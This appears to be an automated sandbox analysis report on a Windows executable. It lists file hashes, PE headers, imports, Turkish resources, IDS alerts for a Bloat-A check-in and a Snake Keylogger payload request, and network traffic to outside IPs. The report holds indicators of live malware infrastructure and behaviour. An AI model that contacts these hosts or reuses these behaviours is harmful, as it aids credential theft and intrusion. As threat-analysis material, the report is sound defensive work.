Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...<..R...,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Download File

Process:	C:\Users\user\Desktop\._cache_file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	647704
Entropy (8bit):	7.215724889481757
Encrypted:	false
SSDEEP:	12288:SnMwHskY7gjcjhVIEhqgM7bWvcsi6aVj7Iy41wXK4Qzh+jMlWCEht:cMysZgjS1hqgSC/izvf0wiz0wyt
MD5:	843288FD72A1152B50B4E4B7344BB592
SHA1:	648416C53721A85666ABAF71C6682FCC1DA70B48
SHA-256:	82C3E3423E48BAFCDD726624EB7FD3E00674E50E4B6ACDCAC408FE8FAE43B022
SHA-512:	04B61BB0A6E748AB78B1037DB68BC9EC1745BB3EFACA0B8FB6D99E01ABBE08A67168CBF3F714B72DAF00DA26084EC6F6F707C3CD08FA8243023E6924719A4E41
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;.......... ....#...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.978966950180418
TrID:	Win32 Executable (generic) a (10002005/4) 92.21% Win32 Executable Borland Delphi 7 (665061/41) 6.13% Windows ActiveX control (116523/4) 1.07% InstallShield setup (43055/19) 0.40% Win32 Executable Delphi generic (14689/80) 0.14%
File name:	file.exe
File size:	15'745'536 bytes
MD5:	7e33585d157419e39fb4d232c9f0c5dc
SHA1:	1cf4864a9b009e12534cc299c14466f2b2c9cea3
SHA256:	027a4baf9864a23fe09d99be3a6f83d1841e47aac2f94d313d2580e84d1b1b39
SHA512:	3abcb07cdde6d8014149e5ad9c07f1afaa88d4a8fb85a67e6f0514ec613ada145dda81713dd96ba0a91f056d65919820b24c6bf2232d59e7fdc6d27f86b01036
SSDEEP:	393216:EU5lptVYmfr7yBG/4WoI+j6LTinXKSf0fzTDvD:v7pttD7yBG/uljIinXj0fX
TLSH:	83F63332F1D14037C2B3053ADD5AE6245D3DBA143F24999BB7EC9D0D5F392822AB6293
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007F8BF4B1479Dh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F8BF4B680E5h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007F8BF4B67CE4h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007F8BF4B680D4h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F8BF4B68148h
call 00007F8BF4B1227Bh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xe59978	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xe59978	0xe59a00	fe72bf384d5cbb67205c2de5793315d7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.12453095684803002
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xe47c48	PE32 executable (GUI) Intel 80386, for MS Windows			0.7639760971069336
RT_RCDATA	0xf00a5c	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0xf00a60	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0xf04660	0x64c	data			0.5998759305210918
RT_RCDATA	0xf04cac	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0xf04e00	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0xf095d4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xf095e8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xf095fc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf09610	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf09624	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf09638	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf0964c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0xf09660	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0xf09674	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T20:40:42.853634+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.4	49736	69.42.215.252	80	TCP
2025-01-02T20:41:42.133241+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.4	49853	216.58.212.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:40:42.244668007 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:40:42.249468088 CET	80	49736	69.42.215.252	192.168.2.4
Jan 2, 2025 20:40:42.249557018 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:40:42.249773979 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:40:42.254538059 CET	80	49736	69.42.215.252	192.168.2.4
Jan 2, 2025 20:40:42.853486061 CET	80	49736	69.42.215.252	192.168.2.4
Jan 2, 2025 20:40:42.853634119 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:41:12.853780985 CET	80	49736	69.42.215.252	192.168.2.4
Jan 2, 2025 20:41:12.853863001 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:41:41.072211027 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.072221041 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.072288036 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.082495928 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.082524061 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.730139017 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.730228901 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.731019974 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.731101990 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.776782990 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.776797056 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.777096987 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:41.778513908 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.780188084 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:41.827342033 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:42.133244038 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:42.134315968 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:42.134407043 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:42.134566069 CET	49853	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:42.134584904 CET	443	49853	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:42.177078962 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.177109957 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:42.177175999 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.177467108 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.177483082 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:42.863497972 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:42.863579988 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.867347956 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.867371082 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:42.867603064 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:42.871510983 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.872402906 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:42.919326067 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:43.284398079 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:43.284446955 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:43.284550905 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:43.284598112 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:43.284614086 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:43.292300940 CET	49863	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:43.292327881 CET	443	49863	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:43.337610960 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:43.337649107 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:43.337738991 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:43.337990046 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:43.337997913 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.001883030 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.004477024 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.111632109 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.111661911 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.111987114 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.111994982 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.414438963 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.414490938 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.414499044 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.414541960 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.415098906 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.415117979 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.415154934 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.415255070 CET	443	49869	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:44.415338039 CET	49869	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:44.422525883 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:44.422557116 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:44.422660112 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:44.423466921 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:44.423479080 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.072254896 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.072319031 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:45.072729111 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:45.072734118 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.072959900 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:45.072964907 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.497840881 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.497891903 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.498006105 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.498014927 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:45.498066902 CET	49880	443	192.168.2.4	142.250.185.65
